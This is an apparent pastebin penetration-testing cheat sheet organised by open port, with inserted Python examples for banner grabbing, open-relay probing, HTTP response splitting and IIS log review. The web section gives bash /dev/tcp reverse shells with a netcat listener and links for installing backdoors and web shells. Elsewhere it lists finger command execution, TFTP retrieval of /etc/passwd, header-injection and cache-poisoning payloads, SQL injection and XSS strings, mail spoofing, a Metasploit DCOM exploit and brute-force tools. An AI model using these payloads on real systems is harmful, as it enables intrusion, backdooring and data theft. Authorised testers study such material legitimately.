Untitled
a guest
Dec 3rd, 2018
  1. • FTP port 21 open
  2. ○ Fingerprint server
  3. § telnet ip_address 21 (Banner grab)
  4. § Run command ftp ip_address
  5. § ftp@example.com
  6. § Check for anonymous access
  7. □ ftp ip_address (Username: anonymous OR anon, Password: any@email.com)
  8. ○ Password guessing
  9. § Hydra brute force
  10. § medusa
  11. § Brutus
  12. ○ Examine configuration files
  13. § ftpusers
  14. § ftp.conf
  15. § proftpd.conf
  16. ○ MiTM
  17. § pasvagg.pl
  18. • SSH port 22 open
  19. ○ Fingerprint server
  20. § telnet ip_address 22 (banner grab)
  21. § scanssh
  22. □ scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
  23. ○ Password guessing
  24. § ssh root@ip_address
  25. § guess-who
  26. □ ./b -l username -h ip_address -p 22 -2 < password_file_location
  27. § Hydra brute force
  28. § brutessh
  29. § Ruby SSH Bruteforcer
  30. ○ Examine configuration files
  31. § ssh_config
  32. § sshd_config
  33. § authorized_keys
  34. § ssh_known_hosts
  35. § .shosts
  36. ○ SSH Client programs
  37. § tunnelier
  38. § winsshd
  39. § putty
  40. § winscp
  41. • Telnet port 23 open
  42. ○ Fingerprint server
  43. § telnet ip_address
  44. □ Common Banner List (OS: banner)
      Solaris 8: SunOS 5.8
      Solaris 2.6: SunOS 5.6
      Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)
      SunOS 4.1.x: SunOS Unix (hostname)
      FreeBSD: FreeBSD/i386 (hostname) (ttyp1)
      NetBSD: NetBSD/i386 (hostname) (ttyp1)
      OpenBSD: OpenBSD/i386 (hostname) (ttyp1)
      Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)
      Debian 3.0: Debian GNU/Linux 3.0 / hostname
      SGI IRIX 6.x: IRIX (hostname)
      IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
      IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
      Nokia IPSO: IPSO (hostname) (ttyp0)
      Cisco IOS: User Access Verification
      Livingston ComOS: ComOS - Livingston PortMaster
  45. § telnetfp
  46. ○ Password Attack
  47. § Common passwords
  48. § Hydra brute force
  49. § Brutus
  50. § telnet -l "-froot" hostname (Solaris 10+)
  51. ○ Examine configuration files
  52. § /etc/inetd.conf
  53. § /etc/xinetd.d/telnet
  54. § /etc/xinetd.d/stelnet
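Added example (not part of the original checklist): a small banner grabber that performs the "telnet ip_address port" fingerprint step listed for FTP, SSH and telnet above over a raw socket and matches what comes back against the Common Banner List. The listeners and banners it runs against are constructed in-process fixtures so it works offline; the host names, ports and sample banners are assumptions for the demonstration, not captured data.

```python
"""Banner grab plus OS guess from the Common Banner List above.

Added example for this checklist, not code from the original page. Everything
here is served by local listener threads with constructed banners, so it runs
offline; in an engagement, call fingerprint(target_ip, 21/22/23/25) directly.
"""
import re
import socket
import threading

# (OS, regex) pairs transcribed from the telnet banner table; the two AIX
# entries differ only in their copyright year, so both years are matched.
BANNER_SIGNATURES = [
    ("Solaris 8", r"SunOS 5\.8"),
    ("Solaris 2.6", r"SunOS 5\.6"),
    ("Solaris 2.4 or 2.5.1", r"Unix\(r\) System V Release 4\.0"),
    ("SunOS 4.1.x", r"SunOS Unix"),
    ("FreeBSD", r"FreeBSD/i386"),
    ("NetBSD", r"NetBSD/i386"),
    ("OpenBSD", r"OpenBSD/i386"),
    ("Red Hat 8.0", r"Red Hat Linux release 8\.0"),
    ("Debian 3.0", r"Debian GNU/Linux 3\.0"),
    ("SGI IRIX 6.x", r"\bIRIX\b"),
    ("IBM AIX 4.1.x", r"AIX Version 4.*1982, 1994"),
    ("IBM AIX 4.2.x or 4.3.x", r"AIX Version 4.*1982, 1996"),
    ("Nokia IPSO", r"\bIPSO\b"),
    ("Cisco IOS", r"User Access Verification"),
    ("Livingston ComOS", r"ComOS - Livingston PortMaster"),
]


def guess_os(banner):
    """Return the first OS whose signature matches, or 'unknown'."""
    for name, pattern in BANNER_SIGNATURES:
        if re.search(pattern, banner):
            return name
    return "unknown"


def grab_banner(host, port, timeout=3.0, probe=b""):
    """Connect, optionally send a probe (HTTP needs one, e.g.
    b"HEAD / HTTP/1.0\\r\\n\\r\\n"; FTP/SSH/SMTP/telnet talk first), and return
    what the service volunteers until it closes or goes quiet for `timeout`."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            while True:
                data = s.recv(1024)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # server kept the line open; we have whatever it sent
    return b"".join(chunks).decode("latin-1", "replace").strip()


def fingerprint(host, port, probe=b""):
    banner = grab_banner(host, port, probe=probe)
    return {"port": port, "banner": banner, "os": guess_os(banner)}


def serve_banner(banner):
    """Constructed fixture: one-shot local listener that sends `banner` and
    hangs up. Returns the ephemeral port it is listening on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


# Constructed banners modelled on the formats the checklist lists (not captures).
SAMPLE_BANNERS = {
    21: b"220 ftp.example.com FTP server (Version wu-2.6.2) ready.\r\n",
    22: b"SSH-2.0-OpenSSH_4.3\r\n",
    23: b"\r\nSunOS 5.8\r\n\r\nlogin: ",
    25: b"220 mail.example.com ESMTP Sendmail 8.13.8/8.13.8; Mon, 3 Dec 2018 10:00:00 GMT\r\n",
    2001: b"\r\nUser Access Verification\r\n\r\nPassword: ",
}

if __name__ == "__main__":
    for real_port, banner in SAMPLE_BANNERS.items():
        local_port = serve_banner(banner)
        print(real_port, fingerprint("127.0.0.1", local_port))
```

The read loop stops on close or on the socket timeout rather than after the first recv, because telnet and SMTP banners often arrive in more than one segment and a one-shot recv would truncate them.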
  55. • Sendmail Port 25 open
  56. ○ Fingerprint server
  57. § telnet ip_address 25 (banner grab)
  58. ○ Mail Server Testing
  59. § Enumerate users
  60. □ VRFY username (verifies if username exists - enumeration of accounts)
  61. □ EXPN alias (expands a mailing list or alias to its member addresses - enumeration of accounts)
  62. § Mail Spoof Test
  63. □ HELO anything
      MAIL FROM: spoofed_address
      RCPT TO: valid_mail_account
      DATA
      (message body)
      .
      QUIT
  64. § Mail Relay Test
  65. □ HELO anything
  66. ® Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
  67. ® Unknown domain - mail from: <user@unknown_domain>
  68. ® Domain not present - mail from: <user@localhost>
  69. ® Domain not supplied - mail from: <user>
  70. ® Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
  71. ® Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
  72. ® Use double quotes - mail from: <user@domain> rcpt to: <"user@recipient-domain">
  73. ® Use IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
  74. ® Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
  75. ® Disparate formatting 2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
  76. ○ Examine Configuration Files
  77. § sendmail.cf
  78. § submit.cf
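Added example (not from the original checklist): the Mail Relay Test above, driven end to end. Both sides are shown. The client issues each MAIL FROM / RCPT TO pair on its own connection and records whether RCPT TO gets a 250; the server is a constructed fake MTA whose relay decision is a substring check on the recipient, which is the kind of sloppy local-domain test the source-routed, bracketed-IP and bang-path forms exist to slip past. example.com, 127.0.0.1 and victim.test are placeholders, and nothing is delivered because DATA is never sent.

```python
"""Open-relay probing with the MAIL FROM / RCPT TO variants listed above.

Added example, not from the original checklist. The target is a constructed
in-process MTA whose relay check is a naive substring test on the recipient,
which is the class of weakness the odd address forms are designed to slip past.
No DATA command is ever sent, so nothing is actually delivered.
"""
import socket
import threading


class NaiveRelayServer(threading.Thread):
    """Constructed fake MTA. Accepts RCPT TO when any of its local names appears
    anywhere in the recipient string (the bug), 554 otherwise."""

    def __init__(self, local_names):
        super().__init__(daemon=True)
        self.local_names = local_names
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(20)
        self.port = self.sock.getsockname()[1]
        self.start()

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            threading.Thread(target=self.handle, args=(conn,), daemon=True).start()

    def handle(self, conn):
        rd = conn.makefile("rb")
        conn.sendall(b"220 mail.example.com ESMTP (constructed)\r\n")
        for raw in rd:
            verb, _, arg = raw.decode("latin-1").rstrip("\r\n").partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                conn.sendall(b"250 mail.example.com\r\n")
            elif verb == "MAIL":
                conn.sendall(b"250 OK\r\n")
            elif verb == "RCPT":
                rcpt = arg.partition(":")[2].strip()          # "TO:<addr>" -> "<addr>"
                local = any(name in rcpt for name in self.local_names)
                conn.sendall(b"250 OK\r\n" if local else b"554 Relay access denied\r\n")
            elif verb == "QUIT":
                conn.sendall(b"221 Bye\r\n")
                break
            else:
                conn.sendall(b"250 OK\r\n")
        conn.close()


def relay_variants(local_domain, local_ip, rcpt_domain):
    """The checklist's ten MAIL FROM / RCPT TO pairs, in the order listed."""
    return [
        ("identical to/from", f"<nobody@{local_domain}>", f"<nobody@{local_domain}>"),
        ("unknown domain", "<user@unknown.invalid>", f"<nobody@{rcpt_domain}>"),
        ("domain not present", "<user@localhost>", f"<nobody@{rcpt_domain}>"),
        ("domain not supplied", "<user>", f"<nobody@{rcpt_domain}>"),
        ("source address omission", "<>", f"<nobody@{rcpt_domain}>"),
        ("ip address of target", f"<user@{local_ip}>", f"<nobody@{rcpt_domain}>"),
        ("double quotes", f"<user@{local_domain}>", f'<"user@{rcpt_domain}">'),
        ("target ip in rcpt", f"<user@{local_domain}>", f"<nobody@{rcpt_domain}@[{local_ip}]>"),
        ("source route", f"<user@[{local_ip}]>", f"<@{local_domain}:nobody@{rcpt_domain}>"),
        ("uucp bang path", f"<user@[{local_ip}]>", f"<{rcpt_domain}!nobody@[{local_ip}]>"),
    ]


def _cmd(sock, rd, line):
    sock.sendall(line.encode("latin-1") + b"\r\n")
    return rd.readline().decode("latin-1").rstrip("\r\n")


def run_relay_tests(host, port, variants, helo="pentest.invalid"):
    """One connection per variant; a 250 to RCPT TO means the server would
    relay. Returns {variant name: accepted}. Stops before DATA."""
    results = {}
    for name, mail_from, rcpt_to in variants:
        with socket.create_connection((host, port), timeout=5) as s:
            rd = s.makefile("rb")
            rd.readline()                       # 220 greeting
            _cmd(s, rd, f"HELO {helo}")
            _cmd(s, rd, f"MAIL FROM:{mail_from}")
            reply = _cmd(s, rd, f"RCPT TO:{rcpt_to}")
            _cmd(s, rd, "QUIT")
            results[name] = reply.startswith("250")
    return results


if __name__ == "__main__":
    srv = NaiveRelayServer(["example.com", "[127.0.0.1]"])
    tests = relay_variants("example.com", "127.0.0.1", "victim.test")
    for name, accepted in run_relay_tests("127.0.0.1", srv.port, tests).items():
        print(f"{'RELAYED' if accepted else 'denied ':8} {name}")
```

HELO rather than EHLO is deliberate: EHLO answers with a multi-line 250 and the one-line reader here would get out of step. The "identical to/from" pair is accepted by any server that serves example.com locally, so it is the control the other nine are read against.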
  79. • DNS port 53 open
  80. ○ Fingerprint server/ service
  81. § host
  82. □ host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
      -v verbose output; -t type: query a specific record type i.e. A, NS, MX or PTR; -a same as -t ANY; -l zone transfer (AXFR) of the named zone, if the server allows it
  83. § nslookup
  84. □ nslookup [ -option ... ] [ host-to-find | - [ server ]]
  85. § dig
  86. □ dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
  87. § whois (-h use the named host to resolve the query; -a use ARIN; -r use RIPE; -p use APNIC; -Q perform a quick lookup)
  88. ○ DNS Enumeration
  89. § Bile Suite
  90. □ perl BiLE.pl [website] [project_name]
  91. □ perl BiLE-weigh.pl [website] [input file]
  92. □ perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
  93. □ perl vet-mx.pl [input file] [true domain file] [output file]
  94. □ perl exp-tld.pl [input file] [output file]
  95. □ perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
  96. □ perl qtrace.pl [ip_address_file] [output_file]
  97. □ perl jarf-rev [subnetblock] [nameserver]
  98. § txdns
  99. □ txdns -rt -t domain_name
  100. □ txdns -x 50 -bb domain_name
  101. □ txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
  102. ○ Examine Configuration Files
  103. § host.conf
  104. § resolv.conf
  105. § named.conf
  106. • TFTP port 69 open
  107. ○ TFTP Enumeration
  108. § tftp ip_address PUT local_file
  109. § tftp ip_address GET conf.txt (or other files)
  110. § Solarwinds TFTP server
  111. § tftp -i <IP> GET /etc/passwd (old Solaris; -i is the Windows tftp client's binary-mode flag)
  112. ○ TFTP Bruteforcing
  113. § TFTP bruteforcer
  114. § Cisco-Torch
  115. • Finger Port 79 open
  116. ○ User enumeration
  117. § finger 'a b c d e f g h' @example.com
  118. § finger admin@example.com
  119. § finger user@example.com
  120. § finger 0@example.com
  121. § finger .@example.com
  122. § finger **@example.com
  123. § finger test@example.com
  124. § finger @example.com
  125. ○ Command execution
  126. § finger "|/bin/id@example.com"
  127. § finger "|/bin/ls -a /@example.com"
  128. ○ Finger Bounce
  129. § finger user@host@victim
  130. § finger @internal@external
  131. • Web Ports 80, 8080 etc. open
  132. ○ Fingerprint server
  133. § Telnet ip_address port
  134. § Firefox plugins
  135. □ All
  136. ® firecat
  137. □ Specific
  138. ® add n edit cookies
  139. ® asnumber
  140. ® header spy
  141. ® live http headers
  142. ® shazou
  143. ® web developer
  144. ○ Crawl website
  145. § lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
  146. § httprint
  147. § Metagoofil
  148. □ metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  149. ○ Web Directory enumeration
  150. § Nikto
  151. □ nikto [-h target] [options]
  152. § DirBuster
  153. § Wikto
  154. § Goolag Scanner
  155. ○ Vulnerability Assessment
  156. § Manual Tests
  157. □ Default Passwords
  158. □ Install Backdoors
  159. ® ASP
  160. ◊ http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
  161. ® Assorted
  162. ◊ http://michaeldaw.org/projects/web-backdoor-compilation/
  163. ◊ http://open-labs.org/hacker_webkit02.tar.gz
  164. ® Perl
  165. ◊ http://home.arcor.de/mschierlm/test/pmsh.pl
  166. ◊ http://pentestmonkey.net/tools/perl-reverse-shell/
  167. ◊ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
  168. ® PHP
  169. ◊ http://php.spb.ru/remview/
  170. ◊ http://pentestmonkey.net/tools/php-reverse-shell/
  171. ◊ http://pentestmonkey.net/tools/php-findsock-shell/
  172. ® Python
  173. ◊ http://matahari.sourceforge.net/
  174. ® TCL
  175. ◊ http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
  176. ® Bash Connect Back Shell
  177. ◊ GnuCitizen
  178. } Attack Box: nc -l -p Port -vvv
  179. } Victim: $ exec 5<>/dev/tcp/IP_Address/Port
  180. Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
  181. ◊ Neohapsis
  182. } Attack Box: nc -l -p Port -vvv
  183. } Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
  184. Victim: $ exec 1>&0 # Next we copy stdin to stdout
  185. Victim: $ exec 2>&0 # And finally stdin to stderr
  186. Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
  187. □ Method Testing
  188. ® nc IP_Address Port
  189. ◊ HEAD / HTTP/1.0
  190. ◊ OPTIONS / HTTP/1.0
  191. ◊ PROPFIND / HTTP/1.0
  192. ◊ TRACE / HTTP/1.1
  193. ◊ PUT http://Target_URL/FILE_NAME
  194. ◊ POST http://Target_URL/FILE_NAME HTTP/1.x
  195. □ Upload Files
  196. ® curl
  197. ◊ curl -u <username:password> -T file_to_upload <Target_URL>
  198. ◊ curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
  199. ® put.pl
  200. ◊ put.pl -h target -r /remote_file_name -f local_file_name
  201. ® webdav
  202. ◊ cadaver
  203. □ View Page Source
  204. ® Hidden Values
  205. ® Developer Remarks
  206. ® Extraneous Code
  207. ® Passwords!
  208. □ Input Validation Checks
  209. ® NULL or null
  210. ◊ Possible error messages returned.
  211. ® ' , " , ; , <!
  212. ◊ Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
  213. ® – , = , + , "
  214. ◊ Used to craft SQL Injection queries.
  215. ® ` , & , ! , | , < , >
  216. ◊ Used to find command execution vulnerabilities.
  217. ® "><script>alert(1)</script>
  218. ◊ Basic Cross-Site Scripting Checks.
  219. ® %0d%0a
  220. ◊ Carriage Return (%0d) Line Feed (%0a)
  221. } HTTP Splitting
  222. – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2044%0d%0a%0d%0a<html>Insert undesirable content here</html>
  223. ◊ i.e. the original response is closed off (Content-Length: 0) and a second, attacker-supplied one follows: HTTP/1.1 200 OK / Content-Type: text/html / Content-Length: 44 / <html>Insert undesirable content here</html> (the Content-Length must match the injected body exactly)
  224. } Cache Poisoning
  225. – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2044%0d%0a%0d%0a<html>Insert undesirable content here</html>
  226. ® %7f , %ff
  227. ◊ byte-length overflows; maximum 7- and 8-bit values.
  228. ® -1, other
  229. ◊ Integer and underflow vulnerabilities.
  230. ® %n , %x , %s
  231. ◊ Testing for format string vulnerabilities.
  232. ® ../
  233. ◊ Directory Traversal Vulnerabilities.
  234. ® % , _, *
  235. ◊ Wildcard characters can sometimes present DoS issues or information disclosure.
  236. ® Ax1024+
  237. ◊ Overflow vulnerabilities.
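Added example (not code from the original page) for the %0d%0a / HTTP splitting checks above: the payload is URL-decoded into a hypothetical redirect that copies the language parameter into its Location header, a hardened builder that rejects control characters sits beside it, and a minimal HTTP/1.x reader shows that the vulnerable output parses as two responses. The application and host name are assumptions; the injected Content-Length is computed from the body so the second response is well-formed.

```python
"""HTTP response splitting: the %0d%0a payload from the checklist, URL-decoded
and dropped into a redirect header by a vulnerable builder; the hardened
builder beside it; and a minimal HTTP/1.x reader that shows a proxy or cache
would see two responses where one was sent.

Added example, not code from the original page. The target application is
hypothetical: a redirect that copies the `language` parameter into Location.
Content-Length for the injected body is computed rather than hard-coded.
"""
from urllib.parse import unquote


def make_split_payload(body, status="200 OK"):
    """The checklist's payload with its Content-Length made correct. Use
    status="304 Not Modified" for the cache-poisoning variant."""
    encoded = (
        "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"             # end response 1
        f"HTTP/1.1%20{status.replace(' ', '%20')}%0d%0a"           # start response 2
        "Content-Type:%20text/html%0d%0a"
        f"Content-Length:%20{len(body.encode())}%0d%0a%0d%0a{body}"
    )
    return unquote(encoded)


def build_redirect_vulnerable(lang):
    """Copies the parameter into a header verbatim, as the payload assumes."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: http://app.example.test/?language={lang}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )


def build_redirect_hardened(lang):
    """Same redirect, but header values are validated first: any CR, LF or
    other control byte is rejected before it reaches the wire."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in lang):
        raise ValueError("control character in header value")
    return build_redirect_vulnerable(lang)


def split_responses(raw):
    """Read a stream the way a simple HTTP/1.x consumer does: status line,
    headers to the blank line, then Content-Length bytes of body. Returns one
    dict per response; stops at anything that is not a status line."""
    responses, pos = [], 0
    while pos < len(raw):
        head_end = raw.find("\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break
        headers = {}
        for line in lines[1:]:
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        responses.append({
            "status": lines[0],
            "headers": headers,
            "body": raw[body_start:body_start + length],
        })
        pos = body_start + length
    return responses


def demo(body="<html>Insert undesirable content here</html>"):
    payload = make_split_payload(body)
    seen = split_responses(build_redirect_vulnerable(payload))
    try:
        build_redirect_hardened(payload)
        blocked = False
    except ValueError:
        blocked = True
    return {
        "responses": len(seen),
        "second_status": seen[1]["status"] if len(seen) > 1 else None,
        "second_body": seen[1]["body"] if len(seen) > 1 else None,
        "hardened_blocked": blocked,
    }


if __name__ == "__main__":
    print(demo())
```

The hardened builder rejects rather than strips: silently removing CR/LF invites encoding tricks (%0d%0a written as bare %0a, or a double-encoded %250d) and leaves no log entry of the attempt.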
  238. □ Automated table and column iteration
  239. ® orderby.py
  240. ◊ ./orderby.py www.site.com/index.php?id=
  241. ® d3sqlfuzz.py
  242. ◊ ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
  243. § Vulnerability Scanners
  244. □ Acunetix
  245. □ Grendelscan
  246. □ NStealth
  247. □ Obiwan III
  248. □ w3af
  249. § Specific Applications/ Server Tools
  250. □ Domino
  251. ® dominoaudit
  252. ◊ dominoaudit.pl [options] -h <IP>
  253. □ Joomla
  254. ® cms_few
  255. ◊ ./cms.py <site-name>
  256. ® joomsq
  257. ◊ ./joomsq.py <IP>
  258. ® joomlascan
  259. ◊ ./joomlascan.py <site> <options>  [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
  260. ® joomscan
  261. ◊ ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
  262. ® jscan
  263. ◊ jscan.pl -f hostname
  264. ◊ (shell.txt required)
  265. □ aspaudit.pl
  266. ® asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
  267. □ Vbulletin
  268. ® vbscan.py
  269. ◊ vbscan.py <host> <port> -v
  270. ◊ vbscan.py -update
  271. □ ZyXel
  272. ® zyxel-bf.sh
  273. ® snmpwalk
  274. ◊ snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
  275. ® snmpget
  276. ◊ snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  277. ○ Proxy Testing
  278. § Burpsuite
  279. § Crowbar
  280. § Interceptor
  281. § Paros
  282. § Requester Raw
  283. § Suru
  284. § WebScarab
  285. ○ Examine configuration files
  286. § Generic
  287. □ Examine httpd.conf/ windows config files
  288. § JBoss
  289. □ JMX Console http://<IP>:8080/jmx-console/
  290. ® War File
  291. § Joomla
  292. □ configuration.php
  293. □ diagnostics.php
  294. □ joomla.inc.php
  295. □ config.inc.php
  296. § Mambo
  297. □ configuration.php
  298. □ config.inc.php
  299. § Wordpress
  300. □ setup-config.php
  301. □ wp-config.php
  302. § ZyXel
  303. □ /WAN.html (contains PPPoE ISP password)
  304. □ /WLAN_General.html and /WLAN.html (contains WEP key)
  305. □ /rpDyDNS.html (contains DDNS credentials)
  306. □ /Firewall_DefPolicy.html (Firewall)
  307. □ /CF_Keyword.html (Content Filter)
  308. □ /RemMagWWW.html (Remote MGMT)
  309. □ /rpSysAdmin.html (System)
  310. □ /LAN_IP.html (LAN)
  311. □ /NAT_General.html (NAT)
  312. □ /ViewLog.html (Logs)
  313. □ /rpFWUpload.html (Tools)
  314. □ /DiagGeneral.html (Diagnostic)
  315. □ /RemMagSNMP.html (SNMP Passwords)
  316. □ /LAN_ClientList.html (Current DHCP Leases)
  317. □ Config Backups
  318. ® /RestoreCfg.html
  319. ® /BackupCfg.html
  320. ® Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
  321. ◊ ZyXEL Config Reader
  322. ○ Examine web server logs
  323. § c:\winnt\system32\Logfiles\W3SVC1
  324. □ awk -F " " '{print $3,$11}' filename | sort | uniq -c (which columns hold c-ip and sc-status depends on the #Fields line of the log; check it before trusting $3/$11)
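Added example (not from the original checklist) for the log review step: the awk column numbers only hold for one IIS field configuration, so this reads the #Fields directive and works by field name, then produces the client/status summary and flags the two things a web assessment usually leaves behind in W3SVC logs, 404 bursts from directory brute-forcing and traversal attempts. The log lines are constructed in the IIS 6 default format, not captured.

```python
"""IIS W3C extended log triage, driven by the #Fields directive instead of
fixed awk column numbers (which move with the logging configuration).

Added example, not from the original checklist. The log below is constructed
in the IIS 6 default format; point parse_w3c() at the contents of
c:\\winnt\\system32\\Logfiles\\W3SVC1\\ex*.log in practice.
"""
from collections import Counter

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2018-12-03 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2018-12-03 10:00:01 10.0.0.5 GET /index.htm - 80 - 10.0.0.77 Mozilla/4.0 200 0 0
2018-12-03 10:00:02 10.0.0.5 GET /admin/ - 80 - 10.0.0.99 Mozilla/5.0+(Nikto) 404 0 2
2018-12-03 10:00:02 10.0.0.5 GET /backup/ - 80 - 10.0.0.99 Mozilla/5.0+(Nikto) 404 0 2
2018-12-03 10:00:03 10.0.0.5 GET /cgi-bin/ - 80 - 10.0.0.99 Mozilla/5.0+(Nikto) 404 0 2
2018-12-03 10:00:03 10.0.0.5 GET /scripts/ - 80 - 10.0.0.99 Mozilla/5.0+(Nikto) 403 0 0
2018-12-03 10:00:04 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 10.0.0.99 Mozilla/5.0+(Nikto) 404 0 2
2018-12-03 10:00:05 10.0.0.5 GET /index.htm - 80 - 10.0.0.77 Mozilla/4.0 200 0 0
"""

TRAVERSAL_MARKERS = ("../", "..\\", "..%2f", "..%5c", "..%255c", "..%c0%af", "..%c1%9c")


def parse_w3c(text):
    """Return one {field: value} dict per record. The #Fields line may change
    mid-file (IIS rewrites it when the configuration changes), so it is
    re-read whenever it appears. IIS encodes spaces inside a field as '+'."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def status_by_client(rows):
    """The awk '{print $3,$11}' | sort | uniq -c step, but keyed by name."""
    return Counter((r["c-ip"], r["sc-status"]) for r in rows)


def suspicious_clients(rows, min_404=3):
    """Clients with enough 404s to look like Nikto/DirBuster, plus every
    request whose path or query carries a traversal sequence, raw or encoded."""
    not_found = Counter(r["c-ip"] for r in rows if r["sc-status"] == "404")
    bursts = {ip: n for ip, n in not_found.items() if n >= min_404}
    traversal = [
        (r["c-ip"], r["cs-uri-stem"], r["sc-status"])
        for r in rows
        if any(m in (r["cs-uri-stem"] + " " + r["cs-uri-query"]).lower() for m in TRAVERSAL_MARKERS)
    ]
    return {"bursts": bursts, "traversal": traversal}


if __name__ == "__main__":
    records = parse_w3c(SAMPLE_LOG)
    for (ip, status), n in sorted(status_by_client(records).items()):
        print(f"{n:4} {ip} {status}")
    print(suspicious_clients(records))
```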
  325. ○ References
  326. § White Papers
  327. □ Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
  328. □ Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
  329. □ Blind Security Testing - An Evolutionary Approach
  330. □ Command Injection in XML Signatures and Encryption
  331. □ Input Validation Cheat Sheet
  332. □ SQL Injection Cheat Sheet
  333. § Books
  334. □ Hacking Exposed Web 2.0
  335. □ Hacking Exposed Web Applications
  336. □ The Web Application Hacker's Handbook
  337. ○ Exploit Frameworks
  338. § Brute-force Tools
  339. □ Acunetix
  340. § Metasploit
  341. § w3af
  342. • Portmapper port 111 open
  343. ○ rpcdump.py
  344. § rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
  345. ○ rpcinfo
  346. § rpcinfo [options] IP_Address
  347. • NTP Port 123 open
  348. ○ NTP Enumeration
  349. § ntpdc -c monlist IP_ADDRESS
  350. § ntpdc -c sysinfo IP_ADDRESS
  351. § ntpq
  352. □ host
  353. □ hostname
  354. □ ntpversion
  355. □ readlist
  356. □ version
  357. ○ Examine configuration files
  358. § ntp.conf
  359. • NetBIOS Ports 135-139,445 open
  360. ○ nmap 192.168.0.101 --script=msrpc-enum
  361. ○ msf > use exploit/windows/dcerpc/ms03_026_dcom
  362. ○ smbclient -L 192.168.1.102
  363. smbclient //192.168.1.106/tmp
  364. smbclient \\\\192.168.1.105\\ipc$ -U john
  365. smbclient //192.168.1.105/ipc$ -U john
  366. ○ NetBIOS enumeration
  367. § Enum
  368. □ enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
  369. § Null Session
  370. □ net use \\192.168.1.1\ipc$ "" /u:""
  371. ® net view \\ip_address
  372. ® Dumpsec
  373. § Smbclient
  374. □ smbclient -L server [-U username%password] [options]
  375. § Superscan
  376. □ Enumeration tab.
  377. § user2sid/sid2user
  378. § Winfo
  379. ○ NetBIOS brute force
  380. § Hydra
  381. § Brutus
  382. § Cain & Abel
  383. § getacct
  384. § NAT (NetBIOS Auditing Tool)
  385. ○ Examine Configuration Files
  386. § Smb.conf
